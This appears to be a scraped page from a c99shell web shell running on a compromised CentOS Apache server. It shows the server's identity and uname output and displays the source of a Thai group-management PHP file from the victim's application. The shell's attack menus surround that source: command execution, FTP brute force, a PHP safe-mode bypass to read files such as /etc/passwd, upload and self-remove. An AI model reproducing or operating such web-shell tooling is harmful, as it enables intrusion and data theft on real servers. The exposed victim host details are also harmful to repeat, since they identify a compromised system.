!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/mis2222/ums/   drwxr-xr-x
Free 52.33 GB of 127.8 GB (40.95%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     umShowGroup.php (2.67 KB)      -rwxr-xr-x
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?
include_once("pagebody.php");
pageHeader();
$pageTitle="กำหนดกลุ่มระบบงาน-กำหนดสิทธิ์";
?>
<table width=100% class="pageTitleBgColor" align="center">
<tr><td align=center><? echo $pageTitle; ?></td></tr>
</table>
<!--your code here-------------------------------------------------------------------------->
<p><br>
<?
include_once("clsUmGroup.php");
include_once("clsUmSystem.php");
$oC = new clsConnection($GLOBALS['HOST'], $GLOBALS['DB'], $GLOBALS['USER'], $GLOBALS['PASSWORD']);
$oGp = new umgroup($oC);
$oSt = new umsystem($oC);
$oSt->RSumsystem();
$oGp->RSumgroupByName();
?>
<table border="0" align="center" cellspacing="1" class="TableBodyBgColor" cellpadding="2">	
  <tr class="TableHeaderBgColor">
    <th>#</th>
    <th>ระบบงาน</th>
    <th>ชื่อกลุ่มงาน(ท)</th>
    <th>ชื่อกลุ่มงาน(E)</th>
    <th>คำอธิบาย</th>
    <th colspan="3">ดำเนินการ</th>
  </tr>
  <?
 $i=0;
while ($oSt->GetRecord()){
	$i++;
	echo "<tr align=center bgcolor=#efefef><td>$i</td>";
	echo "<td align=left colspan=7>$oSt->StNameT</td></tr>";
	$j=0;
	$oGp->RSumGroupByStID($oSt->StID);
	while ($oGp->GetRecord()){
		$j++;
		echo "<tr  class=\"TableRowBgColor\">\n";
		echo "<td></td>\n";
		echo "<td align=center>$j</td>\n";
		echo "<td>" . $oGp->GpNameT . "</td>\n";
		echo "<td>" . $oGp->GpNameE . "</td>\n";
		echo "<td>" . $oGp->GpDesc . "</td>\n";
		echo "<td align=right><a href='#' onClick=\"doEdit($oGp->GpID)\"><img src=\"images/edit.gif\" alt=\"แก้ไข\"  border=\"0\"></a></td>\n";
		if ($oGp->GpID>74){
			echo "<td><a href='#' onClick=\"doDelete(document.form1, '$oGp->GpNameT', $oGp->GpID)\"><img src=\"images/del.gif\" alt=\"ลบ\"  border=\"0\"></a></td>\n";
		}else {
			echo "<td><img src=\"images/delgrey.gif\" alt=\"ลบ\"  border=\"0\"></td>\n";
		}
		echo "<td><a href='#' onClick=\"doGPermission($oGp->GpID)\"><img src=\"images/menu.gif\" alt=\"กำหนดสิทธิ์\"  border=\"0\"></a></td>\n";
	 	echo "</tr>\n";
	}
}
	echo "<tr class=TablefooterBgColor>";
	echo "<td colspan=\"5\">&nbsp;</td>";
	echo "<td colspan=\"3\" align=\"center\"><a href=\"umAddGroup.php\"><img src=\"images/new.gif\" alt=\"เพิ่มกลุ่มผู้ใช้\" border=\"0\"></a></td>";
	echo "</tr>";
?>
</table>
<br>
</p>
<!--------------------------------------------------------------------->
<? 
$oGp->Close();
pageFooter(); 
?>
<!--------------------------------------------------------------------->
<!--put javascript here-->
<script language="javascript">
function doEdit(ID){
	window.location='umEditGroup.php?GpID=' + ID;
}
function doDelete(f,txt,ID){
	if (confirm('ต้องการลบกลุ่มผู้ใช้ ' + txt +  ' ใช่หรือไม่') ) {
		window.location='processUmGroup.php?method=delete&GpID=' + ID;
	}
}
function doGPermission(ID){
	window.location='umGPermission.php?GpID=' + ID;
}
</script>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0051 ]--